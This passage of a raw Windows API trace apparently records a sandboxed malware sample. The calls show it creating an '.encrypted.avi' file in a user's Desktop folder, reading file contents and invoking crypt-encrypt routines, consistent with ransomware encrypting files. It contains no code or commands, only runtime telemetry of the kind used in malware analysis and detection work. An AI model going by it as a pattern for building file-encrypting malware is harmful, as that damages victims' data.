Flags=0x0, Size=0x10) returned 0x88ce38 [0030.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0030.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0030.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0030.901] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0030.901] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0030.901] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0030.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0030.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0030.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0030.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0030.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0030.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0030.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0030.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0030.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0030.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0030.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0030.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0030.901] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0030.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3630 [0030.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0030.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc0) returned 0x7c75d0 [0030.901] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0030.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db300 [0030.901] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0030.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db378 [0030.901] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c75d0 | out: hHeap=0x770000) returned 1 [0030.901] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0030.901] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0030.901] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0030.901] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3630 | out: hHeap=0x770000) returned 1 [0030.901] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0030.901] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db300 | out: hHeap=0x770000) returned 1 [0030.901] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0030.901] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0030.901] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0030.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0030.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5c40 [0030.901] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tpm9533uyxhl8c6vtf")) returned 0x10 [0030.902] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5c40 | out: hHeap=0x770000) returned 1 [0030.902] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0030.902] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db378 | out: hHeap=0x770000) returned 1 [0030.902] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0030.902] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0030.902] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0030.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0030.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x88ffb0 [0030.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0030.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0030.902] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\seoYHLX7CEV1iLpfdx.encrypted.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tpm9533uyxhl8c6vtf\\seoyhlx7cev1ilpfdx.encrypted.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0030.903] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0030.903] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0030.903] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0030.903] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0030.903] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0030.903] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0030.903] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0030.903] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0030.903] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.903] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0030.903] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b85a8 [0030.903] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0030.903] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 [0030.903] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0030.903] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0030.903] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2200 [0030.903] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.903] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0030.903] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.903] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2200 [0030.903] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.903] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0030.903] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0030.903] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0030.903] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0030.903] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0030.903] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0030.903] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0030.904] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0030.904] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0030.904] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0030.904] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0030.904] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0030.904] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0030.904] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0030.904] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0030.904] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0030.904] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0030.904] ReadFile (in: hFile=0x128, lpBuffer=0x936008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x936008*, lpNumberOfBytesRead=0x6ae9b8*=0x10000, lpOverlapped=0x0) returned 1 [0030.905] ReadFile (in: hFile=0x128, lpBuffer=0x936008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x936008*, lpNumberOfBytesRead=0x6ae9b8*=0x5b28, lpOverlapped=0x0) returned 1 [0030.906] ReadFile (in: hFile=0x128, lpBuffer=0x936008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x936008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0030.906] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0030.906] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0030.906] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0030.906] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0030.906] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x15b28) returned 0x89ffb8 [0030.907] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0030.907] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0030.907] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0030.907] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0030.907] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0030.907] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0030.907] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x15b28) returned 0x8b5ae8 [0030.908] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x89ffb8 | out: hHeap=0x770000) returned 1 [0030.908] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0030.908] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.908] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0030.908] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0030.908] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0030.908] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0030.908] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0030.909] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x15b28) returned 0x89ffb8 [0030.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0030.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x89ffb8 | out: hHeap=0x770000) returned 1 [0030.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0030.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0030.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0030.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0030.909] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.909] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0030.909] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0030.909] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0030.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0030.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0030.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0030.909] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0030.909] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.909] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0030.909] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0030.909] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0030.909] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0030.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0030.909] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0030.909] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da2a8 [0030.909] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0030.909] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0030.909] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0030.909] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0030.909] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x15b28) returned 0x89ffb8 [0030.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0030.909] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da198 [0030.909] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0030.909] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0030.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0030.910] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1a8 [0030.910] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0030.910] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0030.910] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0030.910] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da2e8 [0030.910] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0030.910] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0030.910] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0030.910] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c9b8 [0030.910] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0030.910] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0030.910] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0030.910] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0030.910] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2b8 [0030.910] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x15b28) returned 0x8cb618 [0030.911] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0030.911] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0030.911] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0030.911] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0030.911] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0030.911] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0030.911] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0030.911] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0030.911] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0030.911] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0030.911] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0030.911] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0030.911] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0030.911] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0030.911] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0030.911] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.911] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0030.911] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0030.911] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0030.911] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0030.911] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0030.911] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.911] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0030.911] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0030.912] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0030.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0030.912] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0030.912] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0030.912] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0030.912] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da308 [0030.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0030.912] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0030.912] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0030.912] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0030.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0030.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0030.912] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0030.912] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da2f8 [0030.912] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0030.912] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0030.912] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0030.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0030.912] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c838 [0030.912] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0030.912] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0030.912] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0030.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0030.912] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0030.912] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0030.912] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0030.912] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0030.912] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0030.912] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0030.912] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0030.912] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0030.912] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0030.912] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0030.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0030.912] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0030.912] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0030.913] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da208 [0030.913] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0030.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0030.913] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0030.913] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0030.913] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0030.913] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0030.913] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0030.913] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0030.913] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0030.913] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0030.913] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0030.913] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0030.913] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0030.913] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0030.913] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0030.913] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0030.913] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0030.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0030.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0030.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0030.913] HeapFree (in: 